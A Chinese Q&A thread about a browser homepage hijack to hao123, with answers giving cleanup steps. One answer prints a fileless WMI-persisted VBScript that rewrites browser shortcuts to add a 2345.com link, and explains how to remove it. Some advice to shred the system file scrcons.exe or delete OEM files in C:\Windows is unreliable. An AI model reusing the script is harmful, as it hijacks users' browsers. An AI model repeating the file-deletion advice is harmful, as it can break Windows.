所有浏览器主页被hao123劫持
后来发现浏览器打开的瞬间被一闪重启了下,然后就会出现hao123。IE也是同样的情况,金山360都没法解决,锁定主页是肯定不行的。设置里都是正常的。网上的各种方法都试了。
发现好像就上午会发作,下午都没事
http://www.hao123.com/?tn=99182691_hao_pg
有没有人知道这个推广链接是那家公司或什么软件造成的
再次声明网上的普通方法都试过,hao123既然能重启我的浏览器说明不是普通方法能解决的
-------------------------------------------------------------------------------------
按@pjsh6 推荐的链接里的方法3,AdwCleaner去广告的小工具,无用,第二天hao123复发 展开
浏览器主页被劫持的解决步骤:
步骤1:直接修改启动页设置
首先,检查Chrome设置。
点击Chrome浏览器右上角菜单。
点击设置。
启动时,设置为:打开新标签页。
或者点击“打开特定网页或一组网页”,进行手动设置,设置希望的主页。
步骤2:修复Chrome快捷方式
如果步骤1中的修改设置,在重启Chrome浏览器后,无法解决主页被篡改的问题。
则可以右击桌面上的快捷方式,点击“属性”。
在“快捷方式”的目标中,检查chrome.exe文件路径
用鼠标选择路径最后的字符串,确认最后是否有网址。
如果有网址,直接删除网址部分,然后点击应用,确定即可。
步骤3:重新创建Chrome快捷方式
如果步骤2之后,chrome主页仍然被篡改锁定,则可以尝试重建chrome快捷方式。
依然右击chrome快捷方式,点击“查找目标”
找到Chrome安装目录文件夹。
右击chrome.exe文件,点击“发送到”,桌面快捷方式。
然后删除原有的快捷方式,使用新的快捷方式,进入chrome。
步骤4:重置Chrome浏览器设置
如果步骤3依然不能解决主页被篡改的现象,那就尝试重置chrome浏览器全部设置。
方法:
进入Chrome设置页,点击最下方的“高级设置”
将鼠标滚到最底部,点击“重置设置”
然后关闭浏览器,重新打开即可。
步骤5:重新安装Chrome官方最新版
如果步骤4依然不能解决Chrome主页被劫持的问题,那就彻底卸载Chrome,
重新安装Google Chrome官方最新版。
注意,要到Google官网下载,最好是英文版。
如果仍然不行,那就彻底重装系统,并且慎重安装常用的国产软件,防止被捆绑流氓主页的行为。
用管家软件、杀毒软件等方法前先试试这个,可能最简单的办法就可以解决!
右键点开你桌面上的浏览器快捷方式,选“属性”,看一下“目标(T):”这一栏,在浏览器地址后面是不是还跟了其它东西,象这样:
下面怎么办就很清楚了吧,去掉这个尾巴就行了。
可耻的流氓软件可能在你的所有浏览器快捷方式上都这样改动过,检查一下吧。
如果这个办法解决不了,再试试管家软件、杀毒软件、注册表删除等这些方法吧,由简到难,不耽误功夫!
另外补充一下:如果新安装浏览器又出现上面的现象,那就要用那个“尾巴”里的关键字(如上边的hao.169x.cn)来搜注册表进行修改,如下:
如果重启后前面的问题又出现了,那么可以确定是有软件在启动时又加载了这些麻烦,那可能是安装的软件,如激活windows的小马激活工具OEM8及OEM8Server搞的鬼,
也可以在“计算机管理”直接删除或禁用这两个计划任务再重做一下前面两步就行了,见下图:
方法一:
先删除图标上多出来的IE图标(网址快捷方式),进入C:\Users\用户 名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,把你的所有Chrome、IE、Edge浏览器快捷方式属性,把目标栏里的带有“hao123”的地址删掉,如图所示:
方法二:hao123主页怎么删除?
1、按下WIN+R组合键打开运行,在运行里输入regedit,点击确定,打开注册表编辑器(若弹出用户账户控制窗口,请点击 是 继续),依次定位到:HKEY_CURRENT_USER\Software\Policies\Microsoft,展开Microsoft,查看其下是否包含子项 Internet Explorer 若有,删除(右击Internet Explorer,选择“删除”),如图:
2、接着在注册表中重新定位到HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,查看右边细节窗口中[Default_Page_URL]值和[Start Page]值是否有异常。如果被修改了,请根据自己的需要改回(右击键值,选择“修改”进行更改),如图所示:
方法三:hao123主页怎么删除
将系统设置为“显示隐藏的文件、文件夹”,然后在C:\Windows目录下找到OEM文件(或文件夹),将他们删除。再打开这个IE等浏览器就不会出现问题了。
电脑中浏览器主页被hao123劫持的处理方法就为大家介绍到这里了。若是你也遇到类似问题的话,不妨按照上述方法操作看看!
下载360卫士,然后使用其主页劫持工具,可以恢复,但是还没结束,如果这是你高高兴兴地删除360,等第二次打开电脑时,又会出现主页被可恶的123hao劫持的情况,彻底解决问题的办法是,在C:\Windows\System32\wbem\scrcons.exe这个文件中,找到删除scrcons.exe这个文件,他才是罪大恶极的祸端,然后你会发现删除不了,这是还是我们伟大的360卫士来帮忙,打开360卫士的文件粉碎机,把找到的scrcons.exe直接拖进去,OK,123hao劫持主页完美解决,可以感谢并删除360卫士了
方法二
考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。
之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了…),修改Win7下opera快速启动图标路径类似如下:C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\UserPinned\TaskBar\Opera12.01 1532.lnk 查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装http://www.microsoft.com/en-us/download/details.aspx?id=24045 安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图:
点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。 受到影响的浏览器有(各色浏览器,差不多齐了):"IEXPLORE.EXE", "chrome.exe", "firefox.exe","360chrome.exe", "360SE.exe","SogouExplorer.exe", "opera.exe", "Safari.exe","Maxthon.exe", "TTraveler.exe", "TheWorld.exe","baidubrowser.exe", "liebao.exe", "QQBrowser.exe"具体代码如下:On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers =Array("IEXPLORE.EXE", "chrome.exe","firefox.exe", "360chrome.exe", "360SE.exe","SogouExplorer.exe", "opera.exe", "Safari.exe","Maxthon.exe", "TTraveler.exe", "TheWorld.exe","baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):SetoDic = CreateObject("scripting.dictionary"):For Each browser Inbrowsers:oDic.Add LCase(browser), browser:Next:Set fso =CreateObject("Scripting.Filesystemobject"):Set WshShell =CreateObject("Wscript.Shell"):strDesktop ="C:\Users\Gemini\Desktop":strAllUsersDesktop =WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\InternetExplorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\UserPinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\UserPinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file Infso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) ="lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path =oShellLink.TargetPath:name = fso.GetBaseName(path) & "." &fso.GetExtensionName(path):If oDic.Exists(LCase(name))Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes= file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Iffso.FolderExists(UserPinnedStartMenu) Then:For Each file Infso.GetFolder(UserPinnedStartMenu).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each fileIn fso.GetFolder(UserPinnedTaskBar).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:End If
最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!删不掉? 到WMITool安装路径(例如:C:\Program Files(x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉! 暂时就这么多了,还有没有其它影响的话,用用再看吧!解决方法来自:Gemini
希望大家能够把这解决方法普及开来,现在大多人还是用修改快捷方式之类的解决方案,已经落伍了...
原文出处:
http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown
删除桌面上所有已被感染过的浏览器快捷方式;完全卸载已装版本,删除安装压缩包文件、清理注册表信息;查杀修复---木马查杀---全盘扫描---立即修复;杀毒---全盘查杀---一键修复。
简介:
hao123网址之家是百度(baidu.com)旗下网站,创建于1999年5月,是中国最早的上网导航站点,经过10余年的发展,已成为亿万用户上网的第一站、中文上网导航的第一品牌。该网站收录包括音乐、视频、小说、游戏等热门分类的优秀网站,与搜索完美结合,提供最简单便捷的网上导航服务,是数千万网民的上网主页。
组成:
在早期,域名、空间服务器与程序是网站的基本组成部分,随着科技的不断进步,网站的组成也日趋复杂。多数网站由域名、空间服务器、DNS域名解析、网站程序、数据库等组成。